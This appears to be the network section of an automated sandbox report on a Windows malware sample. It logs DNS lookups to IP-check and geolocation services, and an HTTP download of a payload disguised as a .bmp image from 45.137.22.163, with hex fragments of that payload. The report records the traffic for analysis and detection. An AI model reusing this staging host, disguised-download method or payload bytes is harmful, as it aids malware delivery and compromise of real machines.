Apr 12, 2022 21:49:22.401470900 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401477098 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401535988 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401586056 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401595116 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401655912 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401705027 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401717901 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401773930 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401824951 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401828051 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401884079 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401935101 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401945114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402002096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402050018 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402059078 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402123928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402189970 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402216911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402272940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402323961 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402333975 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402390003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402436972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402447939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402509928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402559996 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402565956 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402622938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402674913 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402683973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402746916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402800083 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402808905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402870893 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402925014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.402932882 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.402981043 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.403033018 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.403053045 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.403088093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.403136969 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.403143883 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.403183937 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416320086 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416383982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416413069 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416419029 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416456938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416501999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416511059 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416541100 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416583061 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416590929 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416623116 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416661978 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416676998 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416702032 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416743040 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416771889 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416784048 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416826010 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416836023 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416866064 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416908979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.416922092 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.416938066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417097092 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417140961 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417160034 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417181015 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417221069 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417234898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417262077 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417300940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417315006 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417341948 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417382002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417392015 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417423964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417464972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417474031 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417493105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417531967 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417572021 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417582035 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417613029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417654991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417663097 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417695045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417736053 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417768002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417808056 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417815924 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417849064 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417864084 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417891026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417896986 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.417957067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.417999983 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418008089 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.418039083 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418078899 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418092012 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.418121099 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418159962 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418185949 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.418231964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418261051 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.418282986 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.425791979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.425842047 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.425880909 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.425915003 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.425920963 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.425961971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.425976992 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426003933 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426044941 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426054001 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426084995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426126957 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426131010 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426192999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426235914 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426246881 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426275969 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426320076 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426323891 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426358938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426398993 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426409960 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426443100 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426470041 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426491976 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426507950 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426548958 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426585913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426599979 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426625967 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426662922 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426675081 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426702976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426743984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426757097 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426800013 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426841021 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426848888 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426882029 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426922083 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.426934958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.426960945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427001953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427015066 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.427042007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427086115 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427093983 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.427129030 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427170038 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427177906 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.427212954 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427241087 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.427263021 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.477385998 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:31.062607050 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:38.813165903 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:38.969271898 CEST	80	49786	158.101.44.242	192.168.2.7
Apr 12, 2022 21:49:38.969407082 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:38.970226049 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:39.126214981 CEST	80	49786	158.101.44.242	192.168.2.7
Apr 12, 2022 21:49:39.129817009 CEST	80	49786	158.101.44.242	192.168.2.7
Apr 12, 2022 21:49:39.170767069 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:39.286418915 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:39.444513083 CEST	80	49786	158.101.44.242	192.168.2.7
Apr 12, 2022 21:49:39.557420969 CEST	49786	80	192.168.2.7	158.101.44.242
Apr 12, 2022 21:49:41.439451933 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:41.439492941 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:41.439605951 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:41.700253963 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:41.700294018 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:41.786993980 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:41.787121058 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:41.790658951 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:41.790695906 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:41.791125059 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:41.963335991 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:46.153805971 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:46.197478056 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:46.276228905 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:46.276276112 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:46.278208017 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:46.278595924 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:46.278650999 CEST	443	49787	188.114.97.7	192.168.2.7
Apr 12, 2022 21:49:46.278693914 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:49:46.278788090 CEST	49787	443	192.168.2.7	188.114.97.7
Apr 12, 2022 21:50:44.443805933 CEST	80	49786	158.101.44.242	192.168.2.7
Apr 12, 2022 21:50:44.443881035 CEST	49786	80	192.168.2.7	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2022 21:49:38.548419952 CEST	58846	53	192.168.2.7	8.8.8.8
Apr 12, 2022 21:49:38.567296982 CEST	53	58846	8.8.8.8	192.168.2.7
Apr 12, 2022 21:49:38.601023912 CEST	52971	53	192.168.2.7	8.8.8.8
Apr 12, 2022 21:49:38.619921923 CEST	53	52971	8.8.8.8	192.168.2.7
Apr 12, 2022 21:49:41.410794973 CEST	50125	53	192.168.2.7	8.8.8.8
Apr 12, 2022 21:49:41.434859037 CEST	53	50125	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2022 21:49:38.548419952 CEST	192.168.2.7	8.8.8.8	0xa4b5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.601023912 CEST	192.168.2.7	8.8.8.8	0xe660	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:41.410794973 CEST	192.168.2.7	8.8.8.8	0xee98	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.567296982 CEST	8.8.8.8	192.168.2.7	0xa4b5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:38.619921923 CEST	8.8.8.8	192.168.2.7	0xe660	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:41.434859037 CEST	8.8.8.8	192.168.2.7	0xee98	No error (0)	freegeoip.app		188.114.97.7	A (IP address)	IN (0x0001)
Apr 12, 2022 21:49:41.434859037 CEST	8.8.8.8	192.168.2.7	0xee98	No error (0)	freegeoip.app		188.114.96.7	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

freegeoip.app

45.137.22.163

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49787	188.114.97.7	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49780	45.137.22.163	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2022 21:49:22.016129971 CEST	1084	OUT	GET /fact_Sptqaevl.bmp HTTP/1.1 Host: 45.137.22.163 Connection: Keep-Alive
Apr 12, 2022 21:49:22.047652960 CEST	1085	IN	HTTP/1.1 200 OK Content-Type: image/bmp Last-Modified: Tue, 12 Apr 2022 16:46:21 GMT Accept-Ranges: bytes ETag: "8bfccd68c4ed81:0" Server: Microsoft-IIS/8.5 Date: Tue, 12 Apr 2022 19:49:22 GMT Content-Length: 1321472 Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 70 00 00 00 0c 00 14 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 00 38 00 35 00 35 00 33 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0f 00 46 00 00 00 00 00 34 00 38 00 35 00 35 00 33 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0f 00 42 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 75 00 71 00 71 00 71 00 6b 00 6f 00 70 00 6d 00 6d 00 74 00 6e 00 78 00 6c 00 65 00 66 00 63 00 70 00 79 00 6d 00 6e 00 6b 00 4d 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 1b 00 5e 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 75 00 71 00 71 00 71 00 6b 00 6f 00 70 00 6d 00 6d 00 74 00 6e 00 78 00 6c 00 65 00 66 00 63 00 70 00 79 00 6d 00 6e 00 6b 00 4d 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 1b 00 56 00 00 00 00 00 34 00 38 00 35 00 35 00 33 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00 6c 00 Data Ascii: 1p@48553.7318.0.1noisreV ylbmessAF48553.7318.0.1noisreVtcudorPBemaNtcudorP"lld.uqqqkopmmtnxlefcpymnkMemaneliFlanigirO^skramedarTlageL*thgirypoClageL&lld.uqqqkopmmtnxlefcpymnkMemaNlanretnIV48553.7318.0.1noisreVel
Apr 12, 2022 21:49:22.047702074 CEST	1086	IN	Data Raw: 69 00 46 00 01 00 0f 00 3e 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00 74 00 70 00 69 00 72 00 63 00 73 00 65 00 44 00 65 00 6c 00 69 00 46 00 01 00 01 00 2a 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 79 00 6e 00 61 00 70 00 6d 00 6f 00 Data Ascii: iF>noitpircseDeliF*emaNynapmoC"stnemmoC0b400000~ofnIeliFgnirtSnoitalsnarT$ofnIeliFraV
Apr 12, 2022 21:49:22.047730923 CEST	1088	IN	Data Raw: 98 5c a2 97 5a 91 0a 00 02 94 e4 db 2a 00 00 00 00 08 c2 ec 89 48 5d d1 ff e5 89 48 55 00 02 00 00 00 50 08 0b 00 00 00 08 00 00 00 08 00 00 00 02 08 08 00 00 74 68 67 69 65 68 06 68 74 64 69 77 05 00 00 00 02 65 7a 69 53 2e 67 6e 69 77 61 72 44 Data Ascii: \Z*H]HUPthgiehhtdiweziS.gniwarD.metsySa3a05d11f7f5f30b=nekoTyeKcilbuP ,lartuen=erutluC ,0.0.0.4=noisreV ,gniwarD.metsySQC-&,tt mm:hUm
Apr 12, 2022 21:49:22.047756910 CEST	1089	IN	Data Raw: 74 61 64 5f 6d 0b 72 61 64 6e 65 6c 61 43 74 6c 75 61 66 65 44 73 69 5f 6d 13 6d 65 74 49 61 74 61 44 6e 09 6f 66 6e 49 72 61 64 6e 65 6c 61 43 65 73 55 62 10 65 64 69 72 72 65 76 4f 72 65 73 55 65 73 75 5f 6d 11 44 49 65 72 75 74 6c 75 43 09 73 Data Ascii: tad_mradnelaCtluafeDsi_mmetIataDnofnIradnelaCesUbedirrevOresUesu_mDIerutluCsgalFtamrofylnOdaeRsi_msradnelaClanoitposemaNarEhsilgnEverbba_msemaNarEverbba_msemaNare_msnrettaPemiTgnoLllasnrettaPemiTtrohSllasnrettaPetaDgnoLllasnrett
